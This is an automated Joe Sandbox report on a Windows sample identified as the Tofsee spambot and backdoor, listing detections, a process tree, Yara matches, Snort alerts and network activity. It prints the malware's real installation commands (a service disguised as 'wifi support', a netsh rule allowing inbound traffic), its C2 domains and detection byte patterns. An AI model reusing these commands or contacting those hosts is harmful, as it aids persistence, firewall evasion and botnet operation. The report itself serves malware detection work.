Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800802
MD5:546a040e4479958f7c6b862dead9a269
SHA1:69a99c8f2fbfc316140690be348d6b54d6c01d7d
SHA256:229d8701db31564e7eccab699121e96fe75d70896daa87323e9c59da3be74be0
Tags:exe
Infos:

Detection

Tofsee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Uses netsh to modify the Windows network and firewall settings
Query firmware table information (likely to detect VMs)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses SMTP (mail sending)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5128 cmdline: C:\Users\user\Desktop\file.exe MD5: 546A040E4479958F7C6B862DEAD9A269)
    • cmd.exe (PID: 3076 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2432 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 1020 cmdline: C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5828 cmdline: C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 3108 cmdline: "C:\Windows\System32\sc.exe" start htdzdeug MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 5864 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6120 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3592 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5064 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5400 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1764 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1652 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • qbxctmyn.exe (PID: 4532 cmdline: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe" MD5: D83D3102AEE8419201BF810DE2A41992)
    • svchost.exe (PID: 2888 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 1328 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2140 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 612 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4204 cmdline: c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Tofsee

{"C2 list": ["svartalfheim.top:443", "jotunheim.name:443"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
    00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmpMALWARE_Win_TofseeDetects TofseeditekSHen
    • 0x1123e:$s1: n%systemroot%\system32\cmd.exe
    • 0x10310:$s2: loader_id
    • 0x10340:$s3: start_srv
    • 0x10370:$s4: lid_file_upd
    • 0x10364:$s5: localcfg
    • 0x10a94:$s6: Incorrect respons
    • 0x10b74:$s7: mx connect error
    • 0x10af0:$s8: Error sending command (sent = %d/%d)
    • 0x10c28:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
    00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmpWindows_Trojan_Tofsee_26124fe4unknownunknown
    • 0x2544:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
    • 0xee95:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
    00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
      00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.file.exe.2080e67.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
        0.2.file.exe.2080e67.1.raw.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
        • 0xfc3e:$s1: n%systemroot%\system32\cmd.exe
        • 0xed10:$s2: loader_id
        • 0xed40:$s3: start_srv
        • 0xed70:$s4: lid_file_upd
        • 0xed64:$s5: localcfg
        • 0xf494:$s6: Incorrect respons
        • 0xf574:$s7: mx connect error
        • 0xf4f0:$s8: Error sending command (sent = %d/%d)
        • 0xf628:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
        0.2.file.exe.2080e67.1.raw.unpackWindows_Trojan_Tofsee_26124fe4unknownunknown
        • 0x1944:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
        • 0xe295:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
        17.2.qbxctmyn.exe.e30e67.1.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
        • 0xe110:$s2: loader_id
        • 0xe140:$s3: start_srv
        • 0xe170:$s4: lid_file_upd
        • 0xe164:$s5: localcfg
        • 0xe894:$s6: Incorrect respons
        17.2.qbxctmyn.exe.e30e67.1.unpackWindows_Trojan_Tofsee_26124fe4unknownunknown
        • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
        • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
        Click to see the 39 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.38.8.8.856924532023883 02/07/23-20:05:14.210188
        SID:2023883
        Source Port:56924
        Destination Port:53
        Protocol:UDP
        Classtype:Potentially Bad Traffic
        Timestamp:192.168.2.38.8.8.852387532023883 02/07/23-20:04:33.939091
        SID:2023883
        Source Port:52387
        Destination Port:53
        Protocol:UDP
        Classtype:Potentially Bad Traffic
        Timestamp:192.168.2.38.8.8.860625532023883 02/07/23-20:05:54.726769
        SID:2023883
        Source Port:60625
        Destination Port:53
        Protocol:UDP
        Classtype:Potentially Bad Traffic

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\qbxctmyn.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Multi AV Scanner detection for submitted file
        Source: file.exeReversingLabs: Detection: 43%
        Source: file.exeVirustotal: Detection: 34%Perma Link
        Multi AV Scanner detection for domain / URL
        Source: svartalfheim.topVirustotal: Detection: 17%Perma Link
        Machine Learning detection for sample
        Source: file.exeJoe Sandbox ML: detected
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\qbxctmyn.exeJoe Sandbox ML: detected
        Source: 17.2.qbxctmyn.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
        Source: 23.2.svchost.exe.120000.0.unpackAvira: Label: BDS/Backdoor.Gen
        Source: 17.2.qbxctmyn.exe.e90000.2.unpackAvira: Label: BDS/Backdoor.Gen
        Source: 0.2.file.exe.2080e67.1.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0.2.file.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
        Source: 0.3.file.exe.21c0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 17.3.qbxctmyn.exe.e50000.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 17.2.qbxctmyn.exe.400000.0.unpackMalware Configuration Extractor: Tofsee {"C2 list": ["svartalfheim.top:443", "jotunheim.name:443"]}

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeUnpacked PE file: 17.2.qbxctmyn.exe.400000.0.unpack
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: Binary string: C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr
        Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20230208_040427_786.etl.22.dr
        Source: Binary string: *C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\svchost.exeDomain query: svartalfheim.top
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 176.124.192.220 443Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:52387 -> 8.8.8.8:53
        Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:56924 -> 8.8.8.8:53
        Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:60625 -> 8.8.8.8:53
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: svartalfheim.top:443
        Source: Malware configuration extractorURLs: jotunheim.name:443
        Source: Joe Sandbox ViewASN Name: GULFSTREAMUA GULFSTREAMUA
        Source: Joe Sandbox ViewIP Address: 176.124.192.220 176.124.192.220
        Source: Joe Sandbox ViewIP Address: 176.124.192.220 176.124.192.220
        Source: global trafficTCP traffic: 192.168.2.3:49703 -> 104.47.54.36:25
        Source: svchost.exe, 0000000B.00000002.309310506.00000189DAC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
        Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
        Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
        Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
        Source: svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
        Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
        Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
        Source: svchost.exe, 0000000B.00000003.309061387.00000189DAC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309440269.00000189DAC56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
        Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
        Source: svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309380373.00000189DAC42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309380373.00000189DAC42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
        Source: svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
        Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 0000000B.00000002.309310506.00000189DAC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
        Source: svchost.exe, 0000000B.00000003.309037099.00000189DAC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
        Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 0000000B.00000002.309364718.00000189DAC39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 0000000B.00000003.309061387.00000189DAC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309440269.00000189DAC56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
        Source: unknownDNS traffic detected: queries for: microsoft-com.mail.protection.outlook.com
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,0_2_00402A62
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: file.exe, 00000000.00000002.289843511.00000000007A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Yara detected Tofsee
        Source: Yara matchFile source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 5128, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: qbxctmyn.exe PID: 4532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2888, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
